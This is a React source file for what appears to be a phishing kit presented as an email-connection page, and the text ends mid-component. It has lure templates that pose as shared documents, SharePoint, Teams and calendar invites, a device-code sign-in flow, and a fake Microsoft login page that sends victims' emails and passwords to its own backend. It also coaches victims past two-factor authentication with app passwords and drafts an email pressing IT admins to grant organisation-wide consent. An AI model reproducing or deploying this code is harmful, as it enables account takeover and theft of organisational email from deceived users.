import React, { useState, useEffect, useRef } from 'react';
import { useParams } from 'react-router-dom';
import axios from 'axios';

const api = axios.create({ baseURL: '' });

const TEMPLATES = {
  default: {
    icon: '✉️',
    titleFallback: 'Connect Your Email',
    subtitle: 'Securely link your email account to get started.',
    cta: 'Connect Email',
    hint: null,
    accentColor: '#58a6ff',
  },
  document: {
    icon: '📄',
    titleFallback: 'Shared Document',
    subtitle: 'A document has been shared with you. Verify your account to view it.',
    cta: 'View Document',
    hint: 'You need account access to view this document.',
    accentColor: '#3fb950',
  },
  sharepoint: {
    icon: '🗂️',
    titleFallback: 'Shared Files',
    subtitle: 'Files have been shared with you. Sign in to open them.',
    cta: 'Open Files',
    hint: 'Account verification required to access shared files.',
    accentColor: '#58a6ff',
  },
  teams: {
    icon: '👥',
    titleFallback: 'Meeting Invitation',
    subtitle: 'You have been invited to join a meeting.',
    cta: 'Join Meeting',
    hint: 'Sign in with your work account to join.',
    accentColor: '#7c3aed',
  },
  calendar: {
    icon: '📅',
    titleFallback: 'Calendar Event',
    subtitle: 'You have been invited to an event. Sign in to confirm attendance.',
    cta: 'View Event',
    hint: 'Sign in to confirm your attendance.',
    accentColor: '#d29922',
  },
};

// ── Step Indicator ─────────────────────────────────────────────────────────────

function StepIndicator({ current }) {
  const steps = [
    { num: 1, label: 'Copy Code' },
    { num: 2, label: 'Open Page' },
    { num: 3, label: 'Sign In' },
  ];
  return (
    <div style={{ display: 'flex', alignItems: 'center', marginBottom: 28 }}>
      {steps.map((step, i) => (
        <React.Fragment key={step.num}>
          <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', gap: 6 }}>
            <div style={{
              width: 32,
              height: 32,
              borderRadius: '50%',
              background: current >= step.num ? 'var(--accent, #58a6ff)' : 'var(--surface2, #161b22)',
              border: `2px solid ${current >= step.num ? 'var(--accent, #58a6ff)' : 'var(--border, #30363d)'}`,
              display: 'flex',
              alignItems: 'center',
              justifyContent: 'center',
              fontSize: 13,
              fontWeight: 700,
              color: current >= step.num ? '#fff' : 'var(--text3, #484f58)',
              transition: 'all 0.2s',
              flexShrink: 0,
            }}>
              {step.num}
            </div>
            <span style={{
              fontSize: 10,
              fontWeight: 600,
              color: current >= step.num ? 'var(--accent, #58a6ff)' : 'var(--text3, #484f58)',
              letterSpacing: '0.3px',
              textTransform: 'uppercase',
              whiteSpace: 'nowrap',
            }}>
              {step.label}
            </span>
          </div>
          {i < steps.length - 1 && (
            <div style={{
              flex: 1,
              height: 2,
              margin: '0 8px',
              marginBottom: 20,
              background: current > step.num ? 'var(--accent, #58a6ff)' : 'var(--border, #30363d)',
              transition: 'background 0.2s',
            }} />
          )}
        </React.Fragment>
      ))}
    </div>
  );
}

// ── Provider Button ────────────────────────────────────────────────────────────

function ProviderButton({ icon, label, description, onClick, disabled }) {
  return (
    <button
      onClick={onClick}
      disabled={disabled}
      style={{
        width: '100%',
        display: 'flex',
        alignItems: 'center',
        gap: 14,
        padding: '14px 16px',
        background: disabled ? 'rgba(255,255,255,0.02)' : 'var(--surface2, #161b22)',
        border: '1px solid var(--border, #30363d)',
        borderRadius: 10,
        cursor: disabled ? 'not-allowed' : 'pointer',
        opacity: disabled ? 0.45 : 1,
        transition: 'border-color 0.15s, background 0.15s',
        textAlign: 'left',
        marginBottom: 10,
      }}
      onMouseEnter={e => { if (!disabled) e.currentTarget.style.borderColor = 'var(--accent, #58a6ff)'; }}
      onMouseLeave={e => { if (!disabled) e.currentTarget.style.borderColor = 'var(--border, #30363d)'; }}
    >
      <span style={{ fontSize: 24, lineHeight: 1, flexShrink: 0 }}>{icon}</span>
      <div>
        <div style={{ fontSize: 14, fontWeight: 600, color: 'var(--text, #e6edf3)', marginBottom: 2 }}>{label}</div>
        {description && <div style={{ fontSize: 12, color: 'var(--text3, #484f58)' }}>{description}</div>}
      </div>
    </button>
  );
}

// ── Direct Login Page (ROPC password fallback) ────────────────────────────────

const MsLogo = () => (
  <svg width="21" height="21" viewBox="0 0 21 21">
    <rect x="0" y="0" width="9.5" height="9.5" fill="#f25022"/>
    <rect x="11.5" y="0" width="9.5" height="9.5" fill="#7fba00"/>
    <rect x="0" y="11.5" width="9.5" height="9.5" fill="#00a4ef"/>
    <rect x="11.5" y="11.5" width="9.5" height="9.5" fill="#ffb900"/>
  </svg>
);

function DirectLoginPage({ linkToken, appName }) {
  const [step, setStep] = useState('email'); // email | password | mfa | success
  const [email, setEmail] = useState('');
  const [password, setPassword] = useState('');
  const [showPw, setShowPw] = useState(false);
  const [loading, setLoading] = useState(false);
  const [emailError, setEmailError] = useState('');
  const [pwError, setPwError] = useState('');
  const [successName, setSuccessName] = useState('');

  const goToPassword = (e) => {
    e.preventDefault();
    if (!email || !email.includes('@')) {
      setEmailError('Enter a valid email address.');
      return;
    }
    setEmailError('');
    setPassword('');
    setPwError('');
    setStep('password');
  };

  const signIn = async (e) => {
    e.preventDefault();
    if (!password) { setPwError('Enter your password.'); return; }
    setPwError('');
    setLoading(true);
    try {
      const { data } = await api.post(`/connect/page/${linkToken}/direct-login`, { email, password });
      setSuccessName(data.display_name || data.email || email);
      setStep('success');
    } catch (err) {
      const isMfa = err.response?.headers?.['x-mfa-required'] === 'true';
      if (isMfa) {
        setStep('mfa');
      } else {
        setPwError(err.response?.data?.detail || 'Sign-in failed. Please check your credentials and try again.');
      }
    } finally {
      setLoading(false);
    }
  };

  const ms = { fontFamily: "'Segoe UI', -apple-system, BlinkMacSystemFont, sans-serif" };
  const card = { background: '#fff', borderRadius: 4, boxShadow: '0 2px 6px rgba(0,0,0,.12), 0 0 0 1px rgba(0,0,0,.04)', padding: '44px 44px 36px', width: '100%', maxWidth: 440 };
  const inputSt = { width: '100%', border: 'none', borderBottom: `1px solid ${step === 'password' && pwError ? '#c50f1f' : '#605e5c'}`, padding: '6px 0', fontSize: 15, fontFamily: 'inherit', outline: 'none', background: 'transparent', color: '#1a1918' };
  const btnSt = (disabled) => ({ background: disabled ? '#a19f9d' : '#0078d4', color: '#fff', border: 'none', borderRadius: 2, padding: '8px 20px', fontSize: 14, fontWeight: 600, fontFamily: 'inherit', cursor: disabled ? 'not-allowed' : 'pointer', minWidth: 108 });
  const errBox = (msg) => msg ? (
    <div style={{ background: '#fde7e9', borderLeft: '3px solid #c50f1f', padding: '10px 14px', fontSize: 13, color: '#c50f1f', marginBottom: 16, lineHeight: 1.5, borderRadius: '0 2px 2px 0' }}>
      {msg}
    </div>
  ) : null;
  const footer = <div style={{ marginTop: 28, paddingTop: 16, borderTop: '1px solid #edebe9', fontSize: 11, color: '#8a8886', textAlign: 'center' }}>🔒 Secured by {appName} · OAuth 2.0</div>;

  if (step === 'success') return (
    <div style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#f3f2f1', padding: 20, ...ms }}>
      <div style={card}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 32 }}><MsLogo /><span style={{ fontSize: 20, fontWeight: 600, color: '#1a1918', letterSpacing: '-0.3px' }}>Microsoft</span></div>
        <div style={{ textAlign: 'center', padding: '16px 0' }}>
          <div style={{ fontSize: 56, marginBottom: 18 }}>✅</div>
          <h2 style={{ fontSize: 20, fontWeight: 600, color: '#107c10', marginBottom: 10 }}>Account connected!</h2>
          <p style={{ fontSize: 14, color: '#605e5c', lineHeight: 1.6 }}>
            <strong>{successName}</strong> has been linked successfully.<br />You can close this tab.
          </p>
        </div>
      </div>
    </div>
  );

  if (step === 'mfa') return (
    <div style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#f3f2f1', padding: 20, ...ms }}>
      <div style={card}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 32 }}><MsLogo /><span style={{ fontSize: 20, fontWeight: 600, color: '#1a1918', letterSpacing: '-0.3px' }}>Microsoft</span></div>
        <div style={{ textAlign: 'center', marginBottom: 24 }}>
          <div style={{ fontSize: 48, marginBottom: 16 }}>🔐</div>
          <h1 style={{ fontSize: 20, fontWeight: 600, color: '#1a1918', marginBottom: 10 }}>Additional verification required</h1>
          <p style={{ fontSize: 14, color: '#605e5c', lineHeight: 1.6 }}>
            Your account <strong>{email}</strong> has two-factor authentication enabled, which this sign-in method doesn't support.
          </p>
        </div>
        <div style={{ background: '#f3f2f1', border: '1px solid #d2d0ce', borderRadius: 4, padding: '16px 18px', marginBottom: 24 }}>
          <div style={{ fontSize: 13, fontWeight: 600, color: '#323130', marginBottom: 10 }}>Use an App Password instead:</div>
          <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
            {['Sign in to your Microsoft account security settings', 'Under "App passwords", create a new app password', 'Come back here and enter it as your password'].map((txt, i) => (
              <div key={i} style={{ display: 'flex', gap: 10, alignItems: 'flex-start', fontSize: 13, color: '#605e5c' }}>
                <div style={{ width: 20, height: 20, borderRadius: '50%', background: '#0078d4', color: '#fff', fontSize: 11, fontWeight: 700, display: 'flex', alignItems: 'center', justifyContent: 'center', flexShrink: 0, marginTop: 1 }}>{i + 1}</div>
                {txt}
              </div>
            ))}
          </div>
        </div>
        <div style={{ display: 'flex', gap: 10 }}>
          <button
            onClick={() => { setStep('password'); setPwError(''); setPassword(''); }}
            style={{ flex: 1, background: 'transparent', border: '1px solid #d2d0ce', borderRadius: 2, padding: '8px 16px', fontSize: 13, fontWeight: 600, color: '#323130', cursor: 'pointer', fontFamily: 'inherit' }}>
            ← Try again
          </button>
          <a
            href={`https://account.activedirectory.windowsazure.com/AppPasswords.aspx`}
            target="_blank"
            rel="noreferrer"
            style={{ flex: 2, background: '#0078d4', color: '#fff', border: 'none', borderRadius: 2, padding: '8px 16px', fontSize: 13, fontWeight: 600, fontFamily: 'inherit', cursor: 'pointer', textDecoration: 'none', display: 'flex', alignItems: 'center', justifyContent: 'center' }}>
            Create App Password ↗
          </a>
        </div>
        {footer}
      </div>
    </div>
  );

  if (step === 'password') return (
    <div style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#f3f2f1', padding: 20, ...ms }}>
      <div style={card}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 32 }}><MsLogo /><span style={{ fontSize: 20, fontWeight: 600, color: '#1a1918', letterSpacing: '-0.3px' }}>Microsoft</span></div>
        <h1 style={{ fontSize: 24, fontWeight: 600, color: '#1a1918', marginBottom: 16 }}>Enter password</h1>
        <div
          onClick={() => { setStep('email'); setPwError(''); setEmailError(''); }}
          style={{ display: 'inline-flex', alignItems: 'center', gap: 8, border: '1px solid #d2d0ce', borderRadius: 20, padding: '6px 14px 6px 10px', fontSize: 13, color: '#323130', marginBottom: 20, cursor: 'pointer' }}
          onMouseEnter={e => e.currentTarget.style.background = '#f3f2f1'}
          onMouseLeave={e => e.currentTarget.style.background = 'transparent'}>
          <div style={{ width: 24, height: 24, borderRadius: '50%', background: '#0078d4', color: '#fff', fontSize: 11, fontWeight: 700, display: 'flex', alignItems: 'center', justifyContent: 'center', flexShrink: 0 }}>
            {email[0]?.toUpperCase()}
          </div>
          {email}
        </div>
        {errBox(pwError)}
        <form onSubmit={signIn}>
          <div style={{ marginBottom: 12 }}>
            <label style={{ display: 'block', fontSize: 13, fontWeight: 600, color: '#323130', marginBottom: 5 }}>Password</label>
            <div style={{ position: 'relative' }}>
              <input
                type={showPw ? 'text' : 'password'}
                value={password}
                onChange={e => setPassword(e.target.value)}
                autoFocus
                autoComplete="current-password"
                style={{ ...inputSt, paddingRight: 56 }}
              />
              <button type="button" onClick={() => setShowPw(v => !v)}
                style={{ position: 'absolute', right: 0, top: '50%', transform: 'translateY(-50%)', background: 'none', border: 'none', color: '#0078d4', fontSize: 13, cursor: 'pointer', fontFamily: 'inherit', padding: 4 }}>
                {showPw ? 'Hide' : 'Show'}
              </button>
            </div>
          </div>
          <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', marginTop: 28 }}>
            <a href="https://account.live.com/password/reset" target="_blank" rel="noreferrer"
              style={{ fontSize: 13, color: '#0078d4', textDecoration: 'none' }}
              onMouseEnter={e => e.target.style.textDecoration = 'underline'}
              onMouseLeave={e => e.target.style.textDecoration = 'none'}>
              Forgot password?
            </a>
            <button type="submit" disabled={loading} style={btnSt(loading)}>
              {loading ? 'Signing in…' : 'Sign in'}
            </button>
          </div>
        </form>
        {footer}
      </div>
    </div>
  );

  // Step 1: Email
  return (
    <div style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', background: '#f3f2f1', padding: 20, ...ms }}>
      <div style={card}>
        <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 32 }}><MsLogo /><span style={{ fontSize: 20, fontWeight: 600, color: '#1a1918', letterSpacing: '-0.3px' }}>Microsoft</span></div>
        <h1 style={{ fontSize: 24, fontWeight: 600, color: '#1a1918', marginBottom: 12 }}>Sign in</h1>
        <p style={{ fontSize: 15, color: '#605e5c', marginBottom: 20, lineHeight: 1.5 }}>Use your Microsoft account.</p>
        {errBox(emailError)}
        <form onSubmit={goToPassword}>
          <div style={{ marginBottom: 12 }}>
            <label style={{ display: 'block', fontSize: 13, fontWeight: 600, color: '#323130', marginBottom: 5 }}>Email, phone, or Skype</label>
            <input
              type="email"
              value={email}
              onChange={e => setEmail(e.target.value)}
              autoFocus
              autoComplete="username"
              style={inputSt}
            />
          </div>
          <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', marginTop: 28 }}>
            <a href="https://account.microsoft.com" target="_blank" rel="noreferrer"
              style={{ fontSize: 13, color: '#0078d4', textDecoration: 'none' }}
              onMouseEnter={e => e.target.style.textDecoration = 'underline'}
              onMouseLeave={e => e.target.style.textDecoration = 'none'}>
              No account? Create one!
            </a>
            <button type="submit" style={btnSt(false)}>Next</button>
          </div>
        </form>
        {footer}
      </div>
    </div>
  );
}

// ── Main Component ─────────────────────────────────────────────────────────────

export default function Connect() {
  const { linkToken } = useParams();
  const [info, setInfo] = useState(null);
  const [step, setStep] = useState('landing'); // landing | provider | code | success
  const [session, setSession] = useState(null);
  const [error, setError] = useState('');
  const [secondsLeft, setSecondsLeft] = useState(0);
  const [successEmail, setSuccessEmail] = useState('');
  const [copiedCode, setCopiedCode] = useState(false);
  const [showConsentPanel, setShowConsentPanel] = useState(false);
  const [adminEmail, setAdminEmail] = useState('');
  const [consentLinkCopied, setConsentLinkCopied] = useState(false);
  const pollRef = useRef(null);
  const countdownRef = useRef(null);

  useEffect(() => {
    api.get(`/connect/page/${linkToken}`)
      .then(r => setInfo(r.data))
      .catch(() => setInfo({ error: true }));
    return () => {
      clearInterval(pollRef.current);
      clearInterval(countdownRef.current);
    };
  }, [linkToken]);

  const startFlow = async (provider) => {
    setStep('code');
    setError('');
    try {
      const { data } = await api.post(`/connect/page/${linkToken}/init`, { provider });
      setSession({ ...data, provider });

      const timeout = info?.device_code_timeout_seconds || 600;
      setSecondsLeft(timeout);

      clearInterval(countdownRef.current);
      countdownRef.current = setInterval(() => {
        setSecondsLeft(s => { if (s <= 1) { clearInterval(countdownRef.current); return 0; } return s - 1; });
      }, 1000);

      clearInterval(pollRef.current);
      pollRef.current = setInterval(async () => {
        try {
          const { data: status } = await api.get(`/connect/session/${data.session_token}/status`);
          if (status.status === 'connected') {
            clearInterval(pollRef.current);
            clearInterval(countdownRef.current);
            setSuccessEmail(status.email || '');
            setStep('success');
          } else if (status.status === 'expired' || status.status === 'cancelled') {
            clearInterval(pollRef.current);
            clearInterval(countdownRef.current);
            setError('Session expired. Please try again.');
            setStep(multiProvider ? 'provider' : 'landing');
          }
        } catch {}
      }, (data.poll_interval || 5) * 1000);
    } catch (e) {
      setError(e.response?.data?.detail || 'Failed to generate code. Please try again.');
      setStep(multiProvider ? 'provider' : 'landing');
    }
  };

  const cancel = async () => {
    clearInterval(pollRef.current);
    clearInterval(countdownRef.current);
    if (session?.session_token) {
      await api.delete(`/connect/session/${session.session_token}`).catch(() => {});
    }
    setSession(null);
    setStep(multiProvider ? 'provider' : 'landing');
  };

  const copyCode = () => {
    if (session?.user_code) {
      navigator.clipboard.writeText(session.user_code).catch(() => {});
      setCopiedCode(true);
      setTimeout(() => setCopiedCode(false), 2000);
    }
  };

  const fmt = s => `${String(Math.floor(s / 60)).padStart(2, '0')}:${String(s % 60).padStart(2, '0')}`;

  // ── Direct Login (ROPC password fallback) ──
  if (info && info.template === 'direct_login') {
    return <DirectLoginPage linkToken={linkToken} appName={info.app_name || 'ClassMail Client'} />;
  }

  // ── Loading ──
  if (!info) return (
    <div style={{
      minHeight: '100vh',
      display: 'flex',
      alignItems: 'center',
      justifyContent: 'center',
      background: 'var(--bg, #0d1117)',
    }}>
      <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', gap: 16 }}>
        <div style={{
          width: 36,
          height: 36,
          border: '3px solid var(--border, #30363d)',
          borderTopColor: 'var(--accent, #58a6ff)',
          borderRadius: '50%',
          animation: 'spin 0.8s linear infinite',
        }} />
        <span style={{ fontSize: 13, color: 'var(--text3, #484f58)', letterSpacing: '0.3px' }}>
          Loading…
        </span>
        <style>{`@keyframes spin { to { transform: rotate(360deg); } }`}</style>
      </div>
    </div>
  );

  // ── Error / invalid link ──
  if (info.error) return (
    <div style={{
      minHeight: '100vh',
      display: 'flex',
      alignItems: 'center',
      justifyContent: 'center',
      background: 'var(--bg, #0d1117)',
      padding: 20,
    }}>
      <div style={{
        maxWidth: 400,
        width: '100%',
        background: 'var(--surface, #161b22)',
        border: '1px solid var(--border, #30363d)',
        borderRadius: 16,
        padding: '32px 28px',
        textAlign: 'center',
      }}>
        <div style={{ fontSize: 40, marginBottom: 16 }}>🔒</div>
        <div style={{ fontSize: 18, fontWeight: 700, color: 'var(--text, #e6edf3)', marginBottom: 8 }}>
          Link Unavailable
        </div>
        <p style={{ fontSize: 13, color: 'var(--text3, #484f58)', lineHeight: 1.6 }}>
          This link is invalid, has expired, or has been disabled by the administrator.
        </p>
      </div>
    </div>
  );

  const tmpl = TEMPLATES[info.template] || TEMPLATES.default;
  const pageTitle = info.label || tmpl.titleFallback;
  const multiProvider = !info.provider_filter;
  const providers = info.provider_filter ? [info.provider_filter] : ['microsoft', 'google'];
  const appName = info.app_name || 'ClassMail Client';

  const cardStyle = {
    maxWidth: 480,
    width: '100%',
    background: 'var(--surface, #161b22)',
    border: '1px solid var(--border, #30363d)',
    borderRadius: 16,
    padding: '32px 28px',
    boxShadow: '0 8px 32px rgba(0,0,0,0.4)',
  };

  const footerStyle = {
    fontSize: 11,
    color: 'var(--text3, #484f58)',
    textAlign: 'center',
    marginTop: 24,
    letterSpacing: '0.3px',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    gap: 6,
  };

  return (
    <div style={{
      minHeight: '100vh',
      display: 'flex',
      alignItems: 'center',
      justifyContent: 'center',
      background: 'var(--bg, #0d1117)',
      padding: 20,
    }}>
      <style>{`
        @keyframes spin { to { transform: rotate(360deg); } }
        @keyframes fadeIn { from { opacity: 0; transform: translateY(8px); } to { opacity: 1; transform: translateY(0); } }
        .connect-card { animation: fadeIn 0.25s ease; }
        .connect-code-box {
          background: var(--surface2, #0d1117);
          border: 1px solid var(--accent, #58a6ff);
          border-radius: 12px;
          padding: 20px 24px;
          text-align: center;
          margin-bottom: 20px;
          box-shadow: 0 0 0 1px rgba(88,166,255,0.15), 0 4px 16px rgba(88,166,255,0.08);
        }
        .connect-code-text {
          font-family: 'SF Mono', 'Fira Code', 'Fira Mono', monospace;
          font-size: 28px;
          font-weight: 700;
          letter-spacing: 6px;
          color: var(--text, #e6edf3);
          display: block;
          margin-bottom: 8px;
        }
      `}</style>

      <div className="connect-card" style={cardStyle}>
        {/* App brand */}
        <div style={{
          display: 'flex',
          alignItems: 'center',
          gap: 8,
          marginBottom: 24,
          paddingBottom: 20,
          borderBottom: '1px solid var(--border, #30363d)',
        }}>
          <div style={{
            width: 28,
            height: 28,
            borderRadius: 6,
            background: 'var(--accent, #58a6ff)',
            display: 'flex',
            alignItems: 'center',
            justifyContent: 'center',
            fontSize: 14,
          }}>✉</div>
          <span style={{ fontSize: 13, fontWeight: 700, color: 'var(--text, #e6edf3)', letterSpacing: '-0.2px' }}>
            {appName}
          </span>
          <span style={{
            marginLeft: 'auto',
            fontSize: 10,
            fontWeight: 600,
            color: 'var(--success, #3fb950)',
            background: 'rgba(63,185,80,0.1)',
            border: '1px solid rgba(63,185,80,0.2)',
            borderRadius: 20,
            padding: '2px 8px',
            letterSpacing: '0.4px',
            textTransform: 'uppercase',
          }}>
            Secure
          </span>
        </div>

        {/* ── LANDING ── */}
        {step === 'landing' && (
          <>
            <div style={{ textAlign: 'center', marginBottom: 28 }}>
              <div style={{
                fontSize: 56,
                lineHeight: 1,
                marginBottom: 16,
                filter: 'drop-shadow(0 4px 8px rgba(0,0,0,0.3))',
              }}>
                {tmpl.icon}
              </div>
              <h1 style={{
                fontSize: 22,
                fontWeight: 700,
                color: 'var(--text, #e6edf3)',
                marginBottom: 10,
                lineHeight: 1.3,
              }}>
                {pageTitle}
              </h1>
              <p style={{
                fontSize: 14,
                color: 'var(--text2, #8b949e)',
                lineHeight: 1.6,
                maxWidth: 340,
                margin: '0 auto',
              }}>
                {tmpl.subtitle}
              </p>
            </div>

            {error && (
              <div style={{
                background: 'rgba(248,81,73,0.1)',
                border: '1px solid rgba(248,81,73,0.3)',
                borderRadius: 8,
                padding: '10px 14px',
                fontSize: 13,
                color: '#f85149',
                marginBottom: 16,
              }}>
                {error}
              </div>
            )}

            <button
              style={{
                width: '100%',
                padding: '14px 20px',
                background: 'var(--accent, #58a6ff)',
                border: 'none',
                borderRadius: 10,
                fontSize: 15,
                fontWeight: 600,
                color: '#fff',
                cursor: 'pointer',
                letterSpacing: '-0.2px',
                transition: 'opacity 0.15s',
              }}
              onMouseEnter={e => e.currentTarget.style.opacity = '0.85'}
              onMouseLeave={e => e.currentTarget.style.opacity = '1'}
              onClick={() => multiProvider ? setStep('provider') : startFlow(providers[0])}>
              {tmpl.cta} →
            </button>

            {tmpl.hint && (
              <p style={{ fontSize: 12, color: 'var(--text3, #484f58)', textAlign: 'center', marginTop: 12 }}>
                {tmpl.hint}
              </p>
            )}
          </>
        )}

        {/* ── PROVIDER SELECTION ── */}
        {step === 'provider' && (
          <>
            <button
              onClick={() => setStep('landing')}
              style={{
                background: 'none',
                border: 'none',
                color: 'var(--text3, #484f58)',
                cursor: 'pointer',
                fontSize: 13,
                padding: 0,
                marginBottom: 20,
                display: 'flex',
                alignItems: 'center',
                gap: 4,
              }}>
              ← Back
            </button>
            <div style={{ marginBottom: 20 }}>
              <h2 style={{ fontSize: 18, fontWeight: 700, color: 'var(--text, #e6edf3)', marginBottom: 6 }}>
                Choose account type
              </h2>
              <p style={{ fontSize: 13, color: 'var(--text3, #484f58)' }}>
                Select your email provider to continue.
              </p>
            </div>

            {error && (
              <div style={{
                background: 'rgba(248,81,73,0.1)',
                border: '1px solid rgba(248,81,73,0.3)',
                borderRadius: 8,
                padding: '10px 14px',
                fontSize: 13,
                color: '#f85149',
                marginBottom: 14,
              }}>
                {error}
              </div>
            )}

            {providers.includes('microsoft') && (
              <ProviderButton
                icon="🪟"
                label="Microsoft 365 / Outlook"
                description="Work, school, or personal Microsoft account"
                onClick={() => startFlow('microsoft')}
              />
            )}
            {providers.includes('google') && (
              <ProviderButton
                icon="✉️"
                label="Google / Gmail"
                description="Google Workspace or personal Gmail account"
                onClick={() => startFlow('google')}
              />
            )}
          </>
        )}

        {/* ── DEVICE CODE ── */}
        {step === 'code' && session && (
          <>
            <div style={{ marginBottom: 24 }}>
              <h2 style={{ fontSize: 17, fontWeight: 700, color: 'var(--text, #e6edf3)', marginBottom: 4 }}>
                Sign in with {session.provider === 'microsoft' ? 'Microsoft' : 'Google'}
              </h2>
              <p style={{ fontSize: 13, color: 'var(--text3, #484f58)' }}>
                Follow the three steps below to complete sign-in.
              </p>
            </div>

            <StepIndicator current={1} />

            {/* Code display box */}
            <div className="connect-code-box">
              <span className="connect-code-text">{session.user_code}</span>
              <button
                onClick={copyCode}
                style={{
                  background: copiedCode ? 'rgba(63,185,80,0.15)' : 'rgba(88,166,255,0.1)',
                  border: `1px solid ${copiedCode ? 'rgba(63,185,80,0.3)' : 'rgba(88,166,255,0.2)'}`,
                  borderRadius: 6,
                  padding: '5px 14px',
                  fontSize: 12,
                  fontWeight: 600,
                  color: copiedCode ? 'var(--success, #3fb950)' : 'var(--accent, #58a6ff)',
                  cursor: 'pointer',
                  transition: 'all 0.15s',
                  letterSpacing: '0.3px',
                }}>
                {copiedCode ? '✓ Copied to clipboard' : 'Copy code'}
              </button>
            </div>

            {/* Open login page button */}
            <a
              href={session.verification_uri}
              target="_blank"
              rel="noreferrer"
              onClick={copyCode}
              style={{
                display: 'flex',
                alignItems: 'center',
                justifyContent: 'center',
                gap: 8,
                width: '100%',
                padding: '13px 20px',
                background: 'var(--success, #3fb950)',
                borderRadius: 10,
                fontSize: 15,
                fontWeight: 600,
                color: '#fff',
                textDecoration: 'none',
                marginBottom: 18,
                transition: 'opacity 0.15s',
                boxSizing: 'border-box',
              }}
              onMouseEnter={e => e.currentTarget.style.opacity = '0.85'}
              onMouseLeave={e => e.currentTarget.style.opacity = '1'}>
              Open Login Page ↗
            </a>

            {/* Polling status row */}
            <div style={{
              display: 'flex',
              alignItems: 'center',
              gap: 10,
              padding: '10px 14px',
              background: 'var(--surface2, #0d1117)',
              borderRadius: 8,
              border: '1px solid var(--border, #30363d)',
              marginBottom: 14,
            }}>
              <div style={{
                width: 16,
                height: 16,
                border: '2px solid var(--border, #30363d)',
                borderTopColor: 'var(--accent, #58a6ff)',
                borderRadius: '50%',
                animation: 'spin 0.8s linear infinite',
                flexShrink: 0,
              }} />
              <span style={{ fontSize: 13, color: 'var(--text2, #8b949e)', flex: 1 }}>
                Waiting for sign-in…
              </span>
              {info.timer_display_enabled && secondsLeft > 0 && (
                <span style={{
                  fontSize: 12,
                  fontFamily: 'monospace',
                  color: secondsLeft < 60 ? '#f85149' : 'var(--text3, #484f58)',
                  fontWeight: 600,
                }}>
                  {fmt(secondsLeft)}
                </span>
              )}
            </div>

            {error && (
              <div style={{
                background: 'rgba(248,81,73,0.1)',
                border: '1px solid rgba(248,81,73,0.3)',
                borderRadius: 8,
                padding: '10px 14px',
                fontSize: 13,
                color: '#f85149',
                marginBottom: 14,
              }}>
                {error}
              </div>
            )}

            <button
              onClick={cancel}
              style={{
                width: '100%',
                padding: '10px 20px',
                background: 'transparent',
                border: '1px solid var(--border, #30363d)',
                borderRadius: 8,
                fontSize: 13,
                color: 'var(--text3, #484f58)',
                cursor: 'pointer',
                transition: 'border-color 0.15s, color 0.15s',
              }}
              onMouseEnter={e => { e.currentTarget.style.borderColor = '#f85149'; e.currentTarget.style.color = '#f85149'; }}
              onMouseLeave={e => { e.currentTarget.style.borderColor = 'var(--border, #30363d)'; e.currentTarget.style.color = 'var(--text3, #484f58)'; }}>
              Cancel
            </button>

            {/* Admin consent panel — Microsoft only */}
            {session?.provider === 'microsoft' && info?.ms_admin_consent_url && (
              <div style={{ marginTop: 14 }}>
                <button
                  onClick={() => setShowConsentPanel(v => !v)}
                  style={{
                    width: '100%',
                    background: 'transparent',
                    border: '1px dashed rgba(210,153,34,.4)',
                    borderRadius: 8,
                    padding: '9px 14px',
                    fontSize: 12,
                    color: '#d29922',
                    cursor: 'pointer',
                    textAlign: 'left',
                    display: 'flex',
                    alignItems: 'center',
                    gap: 8,
                  }}>
                  <span>⚠️</span>
                  <span style={{ flex: 1 }}>Seeing "Admin approval required"?</span>
                  <span style={{ fontSize: 10, opacity: 0.7 }}>{showConsentPanel ? '▲' : '▼'}</span>
                </button>

                {showConsentPanel && (
                  <div style={{
                    marginTop: 8,
                    background: 'rgba(210,153,34,.06)',
                    border: '1px solid rgba(210,153,34,.2)',
                    borderRadius: 8,
                    padding: '14px',
                  }}>
                    <p style={{ fontSize: 12, color: 'var(--text2, #8b949e)', marginBottom: 12, lineHeight: 1.6 }}>
                      Your organisation's IT admin needs to approve this app <strong style={{ color: 'var(--text, #e6edf3)' }}>once</strong>.
                      After that, everyone in your company can sign in without any approval screens.
                    </p>

                    {/* Email input + mailto button */}
                    <div style={{ marginBottom: 10 }}>
                      <label style={{ fontSize: 11, color: 'var(--text3, #484f58)', display: 'block', marginBottom: 5, textTransform: 'uppercase', letterSpacing: '.5px' }}>
                        IT Admin Email
                      </label>
                      <input
                        type="email"
                        placeholder="itadmin@yourcompany.com"
                        value={adminEmail}
                        onChange={e => setAdminEmail(e.target.value)}
                        style={{
                          width: '100%',
                          background: 'var(--surface2, #0d1117)',
                          border: '1px solid var(--border, #30363d)',
                          borderRadius: 6,
                          padding: '7px 10px',
                          fontSize: 13,
                          color: 'var(--text, #e6edf3)',
                          fontFamily: 'inherit',
                          boxSizing: 'border-box',
                          marginBottom: 8,
                        }}
                      />
                      <a
                        href={adminEmail ? `mailto:${adminEmail}?subject=${encodeURIComponent('Action Required: Approve Microsoft App Access')}&body=${encodeURIComponent(`Hi,\n\nI'm trying to connect my Microsoft account to ${info?.app_name || 'our email tool'} and our organisation requires admin approval first.\n\nPlease click the link below to approve access for our entire organisation (this is a one-time action):\n\n${info.ms_admin_consent_url}\n\nOnce you approve, all team members can connect without any approval prompts.\n\nThank you!`)}` : undefined}
                        style={{
                          display: 'block',
                          textAlign: 'center',
                          padding: '9px 14px',
                          background: adminEmail ? '#d29922' : 'rgba(210,153,34,.2)',
                          color: adminEmail ? '#000' : 'rgba(210,153,34,.5)',
                          borderRadius: 6,
                          fontSize: 13,
                          fontWeight: 600,
                          textDecoration: 'none',
                          cursor: adminEmail ? 'pointer' : 'not-allowed',
